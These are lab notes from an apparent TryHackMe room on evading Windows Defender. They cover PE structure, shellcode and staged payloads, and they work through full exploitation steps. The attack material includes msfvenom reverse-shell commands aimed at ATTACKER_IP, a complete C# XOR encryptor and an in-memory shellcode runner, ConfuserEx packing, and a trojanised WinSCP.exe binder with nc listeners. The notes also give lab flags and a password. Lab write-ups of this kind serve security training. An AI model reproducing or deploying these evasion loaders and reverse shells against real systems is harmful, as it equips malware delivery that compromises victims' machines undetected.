Evade Anti-virus software -upload shell code .exe file and gain a shell to find flags
Which Antivirus software is running on the vm? -Windows Defender
PE: Windows Executable file format -has various sections
- Headers: metadata, data pointers, entry point, section tables
- Sections: code, imports and data
example of windows loader reads an executable binary and runs it as a process
- type of file, file signature, compiled for x86 or x64, creation timestamp
- parse number of sections the file contains
- mapping file contents into memory based on entrypoint address or relative virtual address
- import dlls, and other objects into memory
- entrypoint address is located and main function runs
-malware analysts analyze exe files based on information in the PE header -control data section to store shellcode
- shellcode as local variable in the main function (.TEXT)
- shellcode as global vairable (.Data)
- shellcode as raw binary in an icon image (.rsrc)
PE-Bear -tool used to parse EXE files and read details File → Load PEs thm-intro2PE.exe →General→MD5 530949
→DOS Hdr→Magic number→value 5A4D
-Optional Hdr→Entry Point 12E4
-File Hdr→Sections Count 7
name of the extra section .flag
-click on .flag THM{PE-N3w-s3ction!}
Introduction to shellcode -crafted machine code instructions that tell the vulnerable program to run additional function -access to a system shell or create a reverse command shell -modifies the code run flow to update registers and functions of the program -generally written in assembly language and translated into hexadecimal opcodes -unique shellcode helps in evading AV software
-understanding of x86 and x64 CPU architectures -assembly language -strong knowledge of C programming language -familiarity with linux and windows os
Syscall: program requests the kernel to do something -each OS has a different calling convention regarding syscalls Linux: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
grab the thm.asm code nasm -f elf64 thm.asm nasm: compile .asm code -f elf64: 64bit linux -returns thm.o : object code ld thm.o -o thm ld: link object and obtain final executable -o: output ./thm -returns “THM,Rocks!”
objdump -d thm -dumps .text section of the compiled binary objcopy -j .text -O binary thm thm.text -extract the text section into a new file thm.text xxd -i thm.text -output binary file in a C string directly
grab thm.c gcc -g -Wall -z execstack thm.c -o thmx ./thmx returns: “THM, Rocks!”
grab flag.c gcc -g -Wall -z execstack flag.c -o flagx ./flagx retuns flag: THM{y0ur-1s7-5h311c0d3}
Generating Shellcode
-shellcode can be generated for a specific format with a particular programming language -positives: no expertise needed to generate shellcode -negatives: almost all generated shellcodes are well-known to AV vendors and are easily detected
eg: shellcode that runs calc.exe msfvenom -a x86 —platform windows -p windows/exec cmd=calc.exe -f c -inject generated shellcode into a C code: calc.c
include <windows.h> char stager[] = { “\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30” “\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff” “\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52” “\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1” “\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b” “\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03” “\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b” “\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24” “\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb” “\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f” “\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5” “\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a” “\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00” }; int main() { DWORD oldProtect; VirtualProtect(stager, sizeof(stager), PAGE_EXECUTE_READ, &oldProtect); int (shellcode)() = (int()())(void*)stager; shellcode(); }
-compile C program i686-w64-mingw32-gcc calc.c -o calc-MSF.exe -connect to smbclient of machine smbclient -u thm ‘//IP/Tools’ -enter password: Password321 -put the compiled program put calc-MSF.exe
Generate Shellcode from EXE files msfvenom -a x86 —platform windows -p windows/exec cmd=calc.exe -f raw > /tmp/example.bin xxd -i /tmp/example.bin -returns the same output as pervious shellcode
Staged Payloads -intermediary shellcode that acts as steps leading to execution of final shellcode -intermediary shellcode: Stager
staged vs. stageless -stageless advantages
- no additonal network connections (less changes of being detected)
- useful for restricted network connectivity -Staged advantages
- small footprint on disk
- final shellcode is not embedded into executable
- final shellcode is loaded into memory and not on disk (less prone to detection)
- can reuse the same stage0 dropper for many shellcodes
stagers in metasploit stageless: windows/x64/shell_reverse_tcp staged: windows/x64/shell/reverse_tcp
Intro to Encoding and Encryption
Encoding: process of chanign the data from original state to other formats using algorithm -useful in program compiling and execution, data storage and transmission, data processing/conversion -AV: used to hide shellcode strings within binary -AV checks encoded string by decoding and checking original form
Encryption: prevention of unauthorized access and manipulation of data -converting planetext(unencrypted content) into encrypted version called Ciphertext -Ciphertext cannot be read or decrypted withough a key and alogrithm used
-AV software blocklist most public tools (Metasploit) -AV high detection rate for public tools
Shellcode Encoding and Encryption
-Create custom payload msfvenom LHOST=ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp > value.txt
-put on windows machine smbclient -U thm ‘//IP/Tools’ put value.txt
-COPY VALUE
-Encode on Encryptor.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks;
namespace Encrypter { internal class Program { private static byte[] xor(byte[] shell, byte[] KeyBytes) { for (int i = 0; i < shell.Length; i++) { shell[i] ^= KeyBytes[i % KeyBytes.Length]; } return shell; } static void Main(string[] args) { //XOR Key - It has to be the same in the Droppr for Decrypting string key = “THMK3y123!”;
//Convert Key into bytes
byte[] keyBytes = Encoding.ASCII.GetBytes(key);
//Original Shellcode here (csharp format)
byte[] buf = new byte[460] { PASTE VALUE };
//XORing byte by byte and saving into a new array of bytes
byte[] encoded = xor(buf, keyBytes);
Console.WriteLine(Convert.ToBase64String(encoded));
}
}
}
-compile on Windows machine csc.exe Encrypter.cs -run Encryptor.exe .\Encryptor.exe -COPY VALUE
-open decoder EncStageless.cs using System; using System.Net; using System.Text; using System.Runtime.InteropServices;
public class Program { [DllImport(“kernel32”)] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport(“kernel32”)] private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
[DllImport(“kernel32”)] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static byte[] xor(byte[] shell, byte[] KeyBytes) { for (int i = 0; i < shell.Length; i++) { shell[i] ^= KeyBytes[i % KeyBytes.Length]; } return shell; } public static void Main() {
string dataBS64 = "PASTE VALUE";
byte[] data = Convert.FromBase64String(dataBS64);
string key = "THMK3y123!";
//Convert Key into bytes
byte[] keyBytes = Encoding.ASCII.GetBytes(key);
byte[] encoded = xor(data, keyBytes);
UInt32 codeAddr = VirtualAlloc(0, (UInt32)encoded.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(encoded, 0, (IntPtr)(codeAddr), encoded.Length);
IntPtr threadHandle = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr parameter = IntPtr.Zero;
threadHandle = CreateThread(0, 0, codeAddr, parameter, 0, ref threadId);
WaitForSingleObject(threadHandle, 0xFFFFFFFF);
} }
-compile EncStageless.cs csc.exe EncStageless.cs
-on attackbox nc -lvp 443
-on windows machine -run file .\EncStageless.exe
Packers -Packers: take a program as input and transform it to a different structure but with same functionality -compress the program -prevent reverse engineering -obfuscate malware
-Packing an app -packing function → transform → unpacking function → execute -unpacking function included by the packer
C:> msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=7478 -f csharp -insert in UnEncStagelessPayload.cs C:> csc UnEncStagelessPayload.cs
open confuserEx -programmed on .NET -add base directory -add output directory -setting enable packer to compressor -add rule edit to maximum -go to protect and protect
-upload to anitvirus software -upload to target IP -get reverse shell nc -lvp 7478
-Binder: program that merges two or more executables into a single one. -used to distribute payload hidden inside another known program -Binding with msfvenom C:> msfvenom -x WinSCP.exe -k -p windows/shell_reverse_tcp lhost=ATTACKER_IP lport=7779 -f exe -o WinSCP-evil.exe -Attack Box: nc -lvp 7779 -Binders and AV: triggers AV without encoders, crypters, or packers
Which AV software is running on the VM? -Windows Defender What is the name of the user account to which you have access? -av-victim Establish a working shell on the vicitm machine and read the file on the user’s Desktop. What is the flag? -THM{H3ll0-W1nD0ws-Def3nd3r!}